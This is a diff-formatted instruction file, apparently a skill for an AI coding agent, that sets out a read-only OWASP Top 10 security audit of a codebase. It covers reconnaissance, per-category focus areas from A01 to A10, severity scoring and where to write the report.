Check for source code by looking for common project indicators:
|
|
27
|
+
- `package.json`, `requirements.txt`, `go.mod`, `pom.xml`, `Cargo.toml`, `Gemfile`, `*.csproj`, `composer.json`
|
|
28
|
+
- Or any `src/`, `app/`, `lib/` directory containing code files
|
|
29
|
+
|
|
30
|
+
**If source code is found:** Use the current working directory as the analysis target. Proceed to Step 2.
|
|
31
|
+
|
|
32
|
+
**If NO source code is found:** Ask the user for a GitHub repository URL. Then clone it:
|
|
33
|
+
```bash
|
|
34
|
+
gh repo clone <url> ./audit-target
|
|
35
|
+
```
|
|
36
|
+
Use `./audit-target` as the analysis target directory. Proceed to Step 2.
|
|
37
|
+
|
|
38
|
+
### Step 2: Reconnaissance
|
|
39
|
+
|
|
40
|
+
Before scanning for vulnerabilities, understand what you're analyzing. This context shapes which patterns matter most.
|
|
41
|
+
|
|
42
|
+
1. **Identify the tech stack** — Read the main dependency manifest (package.json, requirements.txt, etc.) to determine language(s), framework(s), and key libraries
|
|
43
|
+
2. **Map the project structure** — Use Glob to find all source files and understand the directory layout
|
|
44
|
+
3. **Locate entry points** — Find API routes, controllers, handlers, page components (e.g., `**/api/**/*.ts`, `**/routes/**`, `**/controllers/**`, `**/views/**`)
|
|
45
|
+
4. **Find config files** — Glob for `**/*.config.*`, `**/.env*`, `**/settings.*`, `**/application.*`
|
|
46
|
+
5. **Identify auth modules** — Search for authentication/authorization logic, session management, middleware
|
|
47
|
+
6. **Find database access** — Locate ORM models, raw query files, database connection setup
|
|
48
|
+
|
|
49
|
+
Record your findings — they guide which detection patterns to prioritize in Step 3.
|
|
50
|
+
|
|
51
|
+
### Step 3: Systematic Analysis
|
|
52
|
+
|
|
53
|
+
For each OWASP category A01 through A10:
|
|
54
|
+
|
|
55
|
+
1. **Read the reference file** for that category from `references/` to load the relevant CWEs, detection patterns, and grep expressions
|
|
56
|
+
2. **Search the codebase** using the patterns from the reference file — use Grep for pattern matching and Glob for file discovery
|
|
57
|
+
3. **Read flagged files** to confirm findings and get exact line numbers
|
|
58
|
+
4. **Record each finding** with: file path, line number(s), severity level, CWE, description, evidence (code snippet), and recommended fix
|
|
59
|
+
|
|
60
|
+
Analyze each category in order:
|
|
61
|
+
|
|
62
|
+
#### A01: Broken Access Control
|
|
63
|
+
See [references/A01-broken-access-control.md](references/A01-broken-access-control.md) for CWEs, detection patterns, and fix examples.
|
|
64
|
+
|
|
65
|
+
Focus on: missing auth middleware on routes, IDOR (user-controlled IDs without ownership checks), permissive CORS, directory traversal, missing CSRF protection, privilege escalation, force browsing to admin/debug endpoints.
|
|
66
|
+
|
|
67
|
+
#### A02: Security Misconfiguration
|
|
68
|
+
See [references/A02-security-misconfiguration.md](references/A02-security-misconfiguration.md).
|
|
69
|
+
|
|
70
|
+
Focus on: debug mode in production, default credentials, verbose error messages exposing internals, unnecessary features enabled, missing security headers, hardcoded secrets, exposed environment variables.
|
|
71
|
+
|
|
72
|
+
#### A03: Software Supply Chain Failures
|
|
73
|
+
See [references/A03-software-supply-chain-failures.md](references/A03-software-supply-chain-failures.md).
|
|
74
|
+
|
|
75
|
+
Focus on: known vulnerable dependency versions, unpinned dependencies, CDN scripts without SRI, missing lock files, dependencies from untrusted sources.
|
|
76
|
+
|
|
77
|
+
#### A04: Cryptographic Failures
|
|
78
|
+
See [references/A04-cryptographic-failures.md](references/A04-cryptographic-failures.md).
|
|
79
|
+
|
|
80
|
+
Focus on: weak password hashing (MD5, SHA1), missing salt, hardcoded keys/secrets, weak randomness (Math.random for tokens), cookies missing Secure flag, sensitive data in logs, base64 used as "encryption."
|
|
81
|
+
|
|
82
|
+
#### A05: Injection
|
|
83
|
+
See [references/A05-injection.md](references/A05-injection.md).
|
|
84
|
+
|
|
85
|
+
Focus on: SQL injection (string concatenation in queries), command injection (exec/spawn with user input), XSS (dangerouslySetInnerHTML, innerHTML), eval() with user input, SSRF (fetching user-supplied URLs), template injection.
|
|
86
|
+
|
|
87
|
+
#### A06: Insecure Design
|
|
88
|
+
See [references/A06-insecure-design.md](references/A06-insecure-design.md).
|
|
89
|
+
|
|
90
|
+
Focus on: missing rate limiting on auth endpoints, no input validation, no password complexity requirements, missing account lockout, unrestricted file uploads, guessable/non-expiring tokens.
|
|
91
|
+
|
|
92
|
+
#### A07: Authentication Failures
|
|
93
|
+
See [references/A07-authentication-failures.md](references/A07-authentication-failures.md).
|
|
94
|
+
|
|
95
|
+
Focus on: weak/predictable session tokens, sessions that never expire, credentials in logs/URLs, user enumeration via different error messages, reset tokens in API responses, cookies without HttpOnly/Secure/SameSite, hard-coded credentials.
|
|
96
|
+
|
|
97
|
+
#### A08: Software or Data Integrity Failures
|
|
98
|
+
See [references/A08-software-data-integrity-failures.md](references/A08-software-data-integrity-failures.md).
|
|
99
|
+
|
|
100
|
+
Focus on: eval()/Function() with user input, deserialization of untrusted data, CDN scripts without integrity hashes, mass assignment/prototype pollution, auto-updates without signature verification.
|
|
101
|
+
|
|
102
|
+
#### A09: Security Logging and Alerting Failures
|
|
103
|
+
See [references/A09-security-logging-alerting-failures.md](references/A09-security-logging-alerting-failures.md).
|
|
104
|
+
|
|
105
|
+
Focus on: passwords/tokens/PII in logs, missing audit logging for auth events, no logging on access control failures, error details exposed to users, console.log-only logging without persistence.
|
|
106
|
+
|
|
107
|
+
#### A10: Mishandling of Exceptional Conditions
|
|
108
|
+
See [references/A10-mishandling-exceptional-conditions.md](references/A10-mishandling-exceptional-conditions.md).
|
|
109
|
+
|
|
110
|
+
Focus on: empty catch blocks, stack traces returned to users, fail-open patterns, missing error handling on async operations, resource leaks on exceptions, missing transaction rollbacks.
|
|
111
|
+
|
|
112
|
+
### Step 4: Generate Report
|
|
113
|
+
|
|
114
|
+
1. Get today's date and create the output directory:
|
|
115
|
+
```bash
|
|
116
|
+
mkdir -p ./audit/YYYY-MM-DD/
|
|
117
|
+
```
|
|
118
|
+
|
|
119
|
+
2. Read the report template from [references/report-template.md](references/report-template.md)
|
|
120
|
+
|
|
121
|
+
3. Fill in the template with all findings from Step 3 and write the completed report to:
|
|
122
|
+
```
|
|
123
|
+
./audit/YYYY-MM-DD/security-report.md
|
|
124
|
+
```
|
|
125
|
+
|
|
126
|
+
4. Present a brief summary to the user: total findings by severity, overall risk score, and the top 3 most critical items to address immediately.
|
|
127
|
+
|
|
128
|
+
## Severity Classification
|
|
129
|
+
|
|
130
|
+
Assign each finding one of these severity levels:
|
|
131
|
+
|
|
132
|
+
- **Critical** (10 pts): Actively exploitable with immediate data breach risk. Examples: SQL injection, remote code execution, authentication bypass, exposed credentials, command injection.
|
|
133
|
+
|
|
134
|
+
- **High** (7 pts): Exploitable with moderate effort, significant impact. Examples: XSS, CSRF, weak cryptography, IDOR, SSRF, known vulnerable dependencies.
|
|
135
|
+
|
|
136
|
+
- **Medium** (4 pts): Requires specific conditions or must be chained with other vulnerabilities. Examples: missing security headers, verbose errors, user enumeration, missing rate limiting.
|
|
137
|
+
|
|
138
|
+
- **Low** (2 pts): Defense-in-depth issues, best-practice deviations. Examples: weak password policy, console-only logging, missing SRI on CDN scripts.
|
|
139
|
+
|
|
140
|
+
- **Info** (0 pts): Observations and recommendations with no direct exploit path. Examples: outdated but non-vulnerable dependencies, missing SBOM, code quality notes.
|
|
141
|
+
|
|
142
|
+
## Risk Score
|
|
143
|
+
|
|
144
|
+
Sum all finding points to calculate the overall risk score:
|
|
145
|
+
- **0–10**: Low Risk
|
|
146
|
+
- **11–30**: Moderate Risk
|
|
147
|
+
- **31–60**: High Risk
|
|
148
|
+
- **61+**: Critical Risk
|
|
149
|
+
|
|
150
|
+
## Important Guidelines
|
|
151
|
+
|
|
152
|
+
- **Read-only analysis**: Never modify any source files in the target project. The audit directory is the only location where files should be written.
|
|
153
|
+
- **Cover all 10 categories**: If a category has no findings, still include it in the report with "No issues identified" and note what was checked.
|
|
154
|
+
- **Be specific**: Every finding must reference a specific file path and line number(s). Include the actual vulnerable code snippet as evidence.
|
|
155
|
+
- **Provide fixes**: Every finding must include an actionable remediation recommendation with a code example showing the fix.
|
|
156
|
+
- **No false positives**: Read and understand the code context before flagging. A `console.log` in a build script is not the same as a `console.log` leaking passwords in a login handler.
|
|
157
|
+
- **Prioritize**: Order the remediation priority section by actual exploitability and impact, not just severity label.
|